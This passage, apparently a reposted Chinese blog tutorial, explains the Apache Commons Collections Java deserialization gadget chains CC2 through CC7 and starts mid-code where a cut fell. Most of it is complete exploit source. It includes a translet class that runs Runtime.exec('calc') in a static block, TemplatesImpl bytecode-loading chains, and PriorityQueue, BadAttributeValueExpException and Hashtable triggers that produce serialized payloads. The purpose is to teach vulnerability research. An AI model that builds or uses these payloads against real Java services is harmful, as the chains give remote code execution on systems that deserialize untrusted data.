= new objectoutputstream(new fileoutputstream("ser.bin")); oos.writeobject(obj); } public static object unserialize(string filename) throws ioexception,classnotfoundexception{ objectinputstream ois = new objectinputstream(new fileinputstream(filename)); object obj = ois.readobject(); return obj; } } 

于是我们对报错的对应方法下断点进行调试:

经过调试我们发现,之前我们对应赋值的变量都能够通过,这里出现了_auxclasses空指针的现象,所以这里我们结合下面的if<0判断语句发现,这里修改_auxclasses并不能解决问题:

这里判断当前类的父类的值是否为一个常量,而superclass对应的就是我们利用的demo类

private static string abstract_translet = "com.sun.org.apache.xalan.internal.xsltc.runtime.abstracttranslet"; if (superclass.getname().equals(abstract_translet)) { _transletindex = i; } else { _auxclasses.put(_class[i].getname(), _class[i]); } 

所以我们要设置执行代码的父类是对应的abstract_translet值,同时因为父类是一个抽象类,还要实现里面的方法:

exp(cc3templateslmpl):

demo.java package exp; import java.io.ioexception; import com.sun.org.apache.xalan.internal.xsltc.dom; import com.sun.org.apache.xalan.internal.xsltc.transletexception; import com.sun.org.apache.xalan.internal.xsltc.runtime.abstracttranslet; import com.sun.org.apache.xml.internal.dtm.dtmaxisiterator; import com.sun.org.apache.xml.internal.serializer.serializationhandler; public class demo extends abstracttranslet{ static { try { runtime.getruntime().exec("calc"); }catch (ioexception e){ e.printstacktrace(); } } @override public void transform(dom document, serializationhandler[] handlers) throws transletexception { } @override public void transform(dom document, dtmaxisiterator iterator, serializationhandler handler) throws transletexception { } } 

然后我们再利用cc1的链将前半段链子补全得到最后cc6的exp:

package exp; import com.sun.org.apache.xalan.internal.utils.objectfactory; import com.sun.org.apache.xalan.internal.xsltc.trax.templatesimpl; import com.sun.org.apache.xalan.internal.xsltc.trax.transformerfactoryimpl; import org.apache.commons.collections.transformer; import org.apache.commons.collections.functors.chainedtransformer; import org.apache.commons.collections.functors.constanttransformer; import org.apache.commons.collections.functors.invokertransformer; import org.apache.commons.collections.keyvalue.tiedmapentry; import org.apache.commons.collections.map.lazymap; import java.io.*; import java.lang.annotation.target; import java.lang.reflect.constructor; import java.lang.reflect.field; import java.lang.reflect.invocationhandler; import java.lang.reflect.proxy; import java.nio.file.files; import java.nio.file.path; import java.nio.file.paths; import java.security.accesscontroller; import java.security.privilegedaction; import java.util.hashmap; import java.util.map; public class cc3test { public static void main(string[] args) throws exception{ templatesimpl templates = new templatesimpl(); //_name赋值,否则代码return中止 class tc = templates.getclass(); field namefield = tc.getdeclaredfield("_name"); namefield.setaccessible(true); namefield.set(templates,"aaa"); //private byte[][] _bytecodes = null;如果为null,报出异常; //同时满足这个loader.defineclass(_bytecodes[i]); //class defineclass(final byte[] b) { // return defineclass(null, b, 0, b.length); // } field bytecodefield = tc.getdeclaredfield("_bytecodes"); bytecodefield.setaccessible(true); //一维数组满足defineclass参数从而命令执行 byte[] code = files.readallbytes(paths.get("d://tomcat/cc/target/classes/exp/demo.class")); //二维数组满足: // private byte[][] _bytecodes = null;如果为null,报出异常; //同时满足这个loader.defineclass(_bytecodes[i]); byte[][] codes = {code}; bytecodefield.set(templates,codes); // 避免_tfactory为空指针而报错 // templatesimpl.transletclassloader loader = (templatesimpl.transletclassloader) // accesscontroller.doprivileged(new privilegedaction() { // public object run() { // return new templatesimpl.transletclassloader(objectfactory.findclassloader(),_tfactory.getexternalextensionsmap()); // } // }); field tfactoryfield = tc.getdeclaredfield("_tfactory"); tfactoryfield.setaccessible(true); tfactoryfield.set(templates,new transformerfactoryimpl()); // templates.newtransformer(); transformer[] transformers = new transformer[]{ new constanttransformer(templates), new invokertransformer("newtransformer",null,null) }; chainedtransformer chainedtransformer = new chainedtransformer(transformers); // chainedtransformer.transform(1); hashmap<object,object> map = new hashmap<>(); map<object,object> lazymap = lazymap.decorate(map,chainedtransformer); class c = class.forname("sun.reflect.annotation.annotationinvocationhandler"); constructor annotationinvocationhdlconstructor = c.getdeclaredconstructor(class.class,map.class); annotationinvocationhdlconstructor.setaccessible(true); invocationhandler h = (invocationhandler) annotationinvocationhdlconstructor.newinstance(target.class,lazymap); //动态代理 map mapproxy = (map) proxy.newproxyinstance(lazymap.class.getclassloader(),new class[]{map.class},h); object o = annotationinvocationhdlconstructor.newinstance(override.class,mapproxy); // serialize(o); unserialize("ser.bin"); } public static void serialize(object obj) throws ioexception { objectoutputstream oos = new objectoutputstream(new fileoutputstream("ser.bin")); oos.writeobject(obj); } public static object unserialize(string filename) throws ioexception,classnotfoundexception{ objectinputstream ois = new objectinputstream(new fileinputstream(filename)); object obj = ois.readobject(); return obj; } } 

exp(cc3绕过过滤):

我们可以发现如果被禁用了invokertransformer的话,cc哪条链都无法执行,这样的话我们就考虑能否不使用他来构造链子,于是就想找到一个不使用invokertransformer里面反射调用的方法,找到一个可以直接调用templateslmpl的newtransformer的类:

所以cc3链子的作者找到了这样的一个类traxfliter(不存在序列化接口),可以直接调用newtransformer的类:

通过chainedtransformer类中的transform方法,先传入traxfilter.class,然后在通过instantiatetransformer(存在序列化接口)的transform方法,对上面类和类的构造方法进行调用并将templatesimpl templates = new templatesimpl();传入,触发traxfliter构造方法中的templates.newinstance()方法。

transformer[] transformers = new transformer[]{ new constanttransformer(traxfilter.class), new instantiatetransformer(new class[]{templates.class},new object[]{templates}) }; chainedtransformer chainedtransformer = new chainedtransformer(transformers); // chainedtransformer.transform(1); 
package exp; import com.sun.org.apache.xalan.internal.xsltc.trax.templatesimpl; import com.sun.org.apache.xalan.internal.xsltc.trax.traxfilter; import com.sun.org.apache.xalan.internal.xsltc.trax.transformerfactoryimpl; import org.apache.commons.collections.transformer; import org.apache.commons.collections.functors.chainedtransformer; import org.apache.commons.collections.functors.constanttransformer; import org.apache.commons.collections.functors.instantiatetransformer; import org.apache.commons.collections.functors.invokertransformer; import org.apache.commons.collections.map.lazymap; import javax.xml.transform.templates; import java.io.*; import java.lang.annotation.target; import java.lang.reflect.constructor; import java.lang.reflect.field; import java.lang.reflect.invocationhandler; import java.lang.reflect.proxy; import java.nio.file.files; import java.nio.file.paths; import java.util.hashmap; import java.util.map; public class cc3instantiatetransformer { public static void main(string[] args) throws exception{ templatesimpl templates = new templatesimpl(); //_name赋值,否则代码return中止 class tc = templates.getclass(); field namefield = tc.getdeclaredfield("_name"); namefield.setaccessible(true); namefield.set(templates,"aaa"); //private byte[][] _bytecodes = null;如果为null,报出异常; //同时满足这个loader.defineclass(_bytecodes[i]); //class defineclass(final byte[] b) { // return defineclass(null, b, 0, b.length); // } field bytecodefield = tc.getdeclaredfield("_bytecodes"); bytecodefield.setaccessible(true); //一维数组满足defineclass参数从而命令执行 byte[] code = files.readallbytes(paths.get("d://tomcat/cc/target/classes/exp/demo.class")); //二维数组满足: // private byte[][] _bytecodes = null;如果为null,报出异常; //同时满足这个loader.defineclass(_bytecodes[i]); byte[][] codes = {code}; bytecodefield.set(templates,codes); // 避免_tfactory为空指针而报错 // templatesimpl.transletclassloader loader = (templatesimpl.transletclassloader) // accesscontroller.doprivileged(new privilegedaction() { // public object run() { // return new templatesimpl.transletclassloader(objectfactory.findclassloader(),_tfactory.getexternalextensionsmap()); // } // }); field tfactoryfield = tc.getdeclaredfield("_tfactory"); tfactoryfield.setaccessible(true); tfactoryfield.set(templates,new transformerfactoryimpl()); // templates.newtransformer(); // instantiatetransformer instantiatetransformer = new instantiatetransformer(new class[]{templates.class},new object[]{templates}); // instantiatetransformer.transform(traxfilter.class);//类不能序列化,class可以 transformer[] transformers = new transformer[]{ new constanttransformer(traxfilter.class), new instantiatetransformer(new class[]{templates.class},new object[]{templates}) }; chainedtransformer chainedtransformer = new chainedtransformer(transformers); // chainedtransformer.transform(1); hashmap<object,object> map = new hashmap<>(); map<object,object> lazymap = lazymap.decorate(map,chainedtransformer); class c = class.forname("sun.reflect.annotation.annotationinvocationhandler"); constructor annotationinvocationhdlconstructor = c.getdeclaredconstructor(class.class,map.class); annotationinvocationhdlconstructor.setaccessible(true); invocationhandler h = (invocationhandler) annotationinvocationhdlconstructor.newinstance(target.class,lazymap); //动态代理 map mapproxy = (map) proxy.newproxyinstance(lazymap.class.getclassloader(),new class[]{map.class},h); object o = annotationinvocationhdlconstructor.newinstance(override.class,mapproxy); serialize(o); // unserialize("ser.bin"); } public static void serialize(object obj) throws ioexception { objectoutputstream oos = new objectoutputstream(new fileoutputstream("ser.bin")); oos.writeobject(obj); } public static object unserialize(string filename) throws ioexception,classnotfoundexception{ objectinputstream ois = new objectinputstream(new fileinputstream(filename)); object obj = ois.readobject(); return obj; } } 

这就是现在所有的调用链流程图:

commonscollections4:

在cc4的commons-collections版本当中,后续我们提到的利用类transformingcomparator中在cc3版本里并没有提供serializeable接口,而在cc4.0版本当中对接口进行了添加,所以我们就得到了cc4的反序列化利用链,因为还是在cc链当中,所以也是两种利用方式,命令执行和恶意类加载的代码执行,所以这里我们还是通过transform来寻找调用链,依然是两个要求:可以序列化,调用了transform方法,然后我们就找到了transformingcomparator类中的compare方法,并且compare方法还非常常见:

然后我们就需要找其他类中readobject方法中是否能够调用compare方法,于是我们找到了priorityqueue类中的heapify() - > siftdown - > siftdownusingcomparator

exp问题:

在我们简单调用完上面的链子之后,并没能够弹出计算器,所以这里我们就要下断点调试一下,size默认值为0,进不了循环

private void heapify() { for (int i = (size >>> 1) - 1; i >= 0; i--) siftdown(i, (e) queue[i]); } 

需要将size值为2才可以,又因为add函数在序列化时也能够走通链子,所以我们也和前面构造exp一样,先破坏一个值,然后再add以后使用反射修改回来:

exp(cc4transformingcomparator):

package exp; import com.sun.org.apache.xalan.internal.xsltc.trax.templatesimpl; import com.sun.org.apache.xalan.internal.xsltc.trax.traxfilter; import com.sun.org.apache.xalan.internal.xsltc.trax.transformerfactoryimpl; import org.apache.commons.collections4.comparators.transformingcomparator; import org.apache.commons.collections4.transformer; import org.apache.commons.collections4.functors.chainedtransformer; import org.apache.commons.collections4.functors.constanttransformer; import org.apache.commons.collections4.functors.*; import org.apache.commons.collections4.functors.instantiatetransformer; import org.apache.commons.collections4.map.lazymap; import javax.xml.transform.templates; import java.io.*; import java.lang.annotation.target; import java.lang.reflect.constructor; import java.lang.reflect.field; import java.lang.reflect.invocationhandler; import java.lang.reflect.proxy; import java.nio.file.files; import java.nio.file.paths; import java.util.hashmap; import java.util.map; import java.util.priorityqueue; public class cc4transformingcomparator { public static void main(string[] args) throws exception{ templatesimpl templates = new templatesimpl(); //_name赋值,否则代码return中止 class tc = templates.getclass(); field namefield = tc.getdeclaredfield("_name"); namefield.setaccessible(true); namefield.set(templates,"aaa"); //private byte[][] _bytecodes = null;如果为null,报出异常; //同时满足这个loader.defineclass(_bytecodes[i]); //class defineclass(final byte[] b) { // return defineclass(null, b, 0, b.length); // } field bytecodefield = tc.getdeclaredfield("_bytecodes"); bytecodefield.setaccessible(true); //一维数组满足defineclass参数从而命令执行 byte[] code = files.readallbytes(paths.get("d://tomcat/cc/target/classes/exp/demo.class")); //二维数组满足: // private byte[][] _bytecodes = null;如果为null,报出异常; //同时满足这个loader.defineclass(_bytecodes[i]); byte[][] codes = {code}; bytecodefield.set(templates,codes); // 避免_tfactory为空指针而报错 // templatesimpl.transletclassloader loader = (templatesimpl.transletclassloader) // accesscontroller.doprivileged(new privilegedaction() { // public object run() { // return new templatesimpl.transletclassloader(objectfactory.findclassloader(),_tfactory.getexternalextensionsmap()); // } // }); // field tfactoryfield = tc.getdeclaredfield("_tfactory"); // tfactoryfield.setaccessible(true); // tfactoryfield.set(templates,new transformerfactoryimpl()); // templates.newtransformer(); instantiatetransformer instantiatetransformer = new instantiatetransformer(new class[]{templates.class},new object[]{templates}); // instantiatetransformer.transform(traxfilter.class);//类不能序列化,class可以 transformer[] transformers = new transformer[]{ new constanttransformer(traxfilter.class), instantiatetransformer }; chainedtransformer chainedtransformer = new chainedtransformer(transformers); transformingcomparator transformingcomparator = new transformingcomparator(new constanttransformer<>(1)); priorityqueue priorityqueue = new priorityqueue<>(transformingcomparator); //size长度要加2 priorityqueue.add(1); priorityqueue.add(1); class c = transformingcomparator.getclass(); field transformedfield = c.getdeclaredfield("transformer"); transformedfield.setaccessible(true); transformedfield.set(transformingcomparator,chainedtransformer); // serialize(priorityqueue); unserialize("ser.bin"); } public static void serialize(object obj) throws ioexception { objectoutputstream oos = new objectoutputstream(new fileoutputstream("ser.bin")); oos.writeobject(obj); } public static object unserialize(string filename) throws ioexception,classnotfoundexception{ objectinputstream ois = new objectinputstream(new fileinputstream(filename)); object obj = ois.readobject(); return obj; } } 

commonscollections2:

不走traxfilter.class的路线,直接用invokertransform调用newtransformer,通过add来传入参数,不使用自定义数组constanttransformer

package exp; import com.sun.org.apache.xalan.internal.xsltc.trax.templatesimpl; import org.apache.commons.collections4.comparators.transformingcomparator; import org.apache.commons.collections4.functors.constanttransformer; import org.apache.commons.collections4.functors.*; import java.io.*; import java.lang.reflect.field; import java.nio.file.files; import java.nio.file.paths; import java.util.priorityqueue; public class cc2 { public static void main(string[] args) throws exception{ templatesimpl templates = new templatesimpl(); class tc = templates.getclass(); field namefield = tc.getdeclaredfield("_name"); namefield.setaccessible(true); namefield.set(templates,"aaa"); field bytecodefield = tc.getdeclaredfield("_bytecodes"); bytecodefield.setaccessible(true); byte[] code = files.readallbytes(paths.get("d://tomcat/cc/target/classes/exp/demo.class")); byte[][] codes = {code}; bytecodefield.set(templates,codes); invokertransformer<object,object> invokertransformer = new invokertransformer<>("newtransformer",new class[]{},new object[]{}); transformingcomparator transformingcomparator = new transformingcomparator(new constanttransformer<>(1)); priorityqueue priorityqueue = new priorityqueue<>(transformingcomparator); //size长度要加2并将temlates传入 priorityqueue.add(templates); priorityqueue.add(templates); class c = transformingcomparator.getclass(); field transformedfield = c.getdeclaredfield("transformer"); transformedfield.setaccessible(true); transformedfield.set(transformingcomparator,invokertransformer); serialize(priorityqueue); unserialize("ser.bin"); } public static void serialize(object obj) throws ioexception { objectoutputstream oos = new objectoutputstream(new fileoutputstream("ser.bin")); oos.writeobject(obj); } public static object unserialize(string filename) throws ioexception,classnotfoundexception{ objectinputstream ois = new objectinputstream(new fileinputstream(filename)); object obj = ois.readobject(); return obj; } } 

commonscollections5:

badattributevalueexpexceptionl类的readobject方法中有tostring方法,然后tostring方法能够调用getvalue方法,然后调用tiedmapentry中的getvalue,后面就能够调用lazymap里面的get方法:

package exp; import org.apache.commons.collections.transformer; import org.apache.commons.collections.functors.chainedtransformer; import org.apache.commons.collections.functors.constanttransformer; import org.apache.commons.collections.functors.invokertransformer; import org.apache.commons.collections.keyvalue.tiedmapentry; import org.apache.commons.collections.map.lazymap; import javax.management.badattributevalueexpexception; import java.io.fileinputstream; import java.io.ioexception; import java.io.objectinputstream; import java.io.fileoutputstream; import java.io.objectoutputstream; import java.lang.annotation.target; import java.lang.reflect.constructor; import java.lang.reflect.field; import java.lang.reflect.invocationhandler; import java.lang.reflect.proxy; import java.util.hashmap; import java.util.map; public class cc5badattributevalueexpexception { public static void main(string[] args) throws exception{ transformer[] transformers = new transformer[]{ new constanttransformer(runtime.class), new invokertransformer("getmethod",new class[]{string.class,class[].class},new object[]{"getruntime",null}), new invokertransformer("invoke",new class[]{object.class,object[].class},new object[]{null,null}), new invokertransformer("exec",new class[]{string.class},new object[]{"calc"}) }; chainedtransformer chainedtransformer = new chainedtransformer(transformers); //赋值操作 hashmap<object,object> map = new hashmap<>(); map<object,object> lazymap = lazymap.decorate(map,chainedtransformer); tiedmapentry tiedmapentry = new tiedmapentry(lazymap,"aaa"); //设置私有属性val badattributevalueexpexception badattributevalueexpexception = new badattributevalueexpexception(null); class bv = class.forname("javax.management.badattributevalueexpexception"); field val = bv.getdeclaredfield("val"); val.setaccessible(true); val.set(badattributevalueexpexception,tiedmapentry); // serialize(badattributevalueexpexception); unserialize("ser.bin"); } public static void serialize(object obj) throws ioexception { objectoutputstream oos = new objectoutputstream(new fileoutputstream("ser.bin")); oos.writeobject(obj); } public static object unserialize(string filename) throws ioexception,classnotfoundexception{ objectinputstream ois = new objectinputstream(new fileinputstream(filename)); object obj = ois.readobject(); return obj; } } 

commonscollections7:

入口点利用了hashtable通过readobject中调用reconstitutionput,然后又调用了equals,然后找到了abstractmapdecorator类中的equals方法中调用了get方法。

然后在equals中存在一个哈希碰撞,比较罕见,这里就不展开来研究了,可以参考fakesoul师傅写的文章:

import org.apache.commons.collections.transformer; import org.apache.commons.collections.functors.chainedtransformer; import org.apache.commons.collections.functors.constanttransformer; import org.apache.commons.collections.functors.invokertransformer; import org.apache.commons.collections.map.lazymap; import java.io.*; import java.lang.reflect.field; import java.util.hashmap; import java.util.hashtable; import java.util.map; public class cc7 { public static void main(string[] args) throws nosuchfieldexception, illegalaccessexception, ioexception, classnotfoundexception { transformer[] fakeformers = new transformer[]{new constanttransformer(2)}; transformer[] transforms = new transformer[]{ new constanttransformer(runtime.class), new invokertransformer("getmethod", new class[]{string.class, class[].class}, new object[]{"getruntime", null}), new invokertransformer("invoke", new class[]{object.class, object[].class}, new object[]{null, null}), new invokertransformer("exec", new class[]{string.class}, new object[]{"calc"}), }; chainedtransformer chainedtransformer = new chainedtransformer(fakeformers); map innermap1 = new hashmap(); innermap1.put("pp",1); map innermap2 = new hashmap(); innermap2.put("oo",1); map lazymap1 = lazymap.decorate(innermap1, chainedtransformer); map lazymap2 = lazymap.decorate(innermap2, chainedtransformer); hashtable hashtable = new hashtable(); hashtable.put(lazymap1,1); hashtable.put(lazymap2,2); lazymap2.remove("pp"); class clazz = chainedtransformer.class; field field = clazz.getdeclaredfield("itransformers"); field.setaccessible(true); field.set(chainedtransformer,transforms); bytearrayoutputstream bos = new bytearrayoutputstream(); objectoutputstream oos = new objectoutputstream(bos); oos.writeobject(hashtable); oos.close(); objectinputstream ois = new objectinputstream(new bytearrayinputstream(bos.tobytearray())); ois.readobject(); } } 

最后给出所有调用链的一个简单的思维导图供大家总结:

原文链接:https://xz.aliyun.com/t/12692

网络摘文,本文作者:15h,如若转载,请注明出处:https://www.15cov.cn/2023/08/27/java反序列化之cc调用链过程1-7探究详解/

发表评论

邮箱地址不会被公开。 必填项已用*标注

网站地图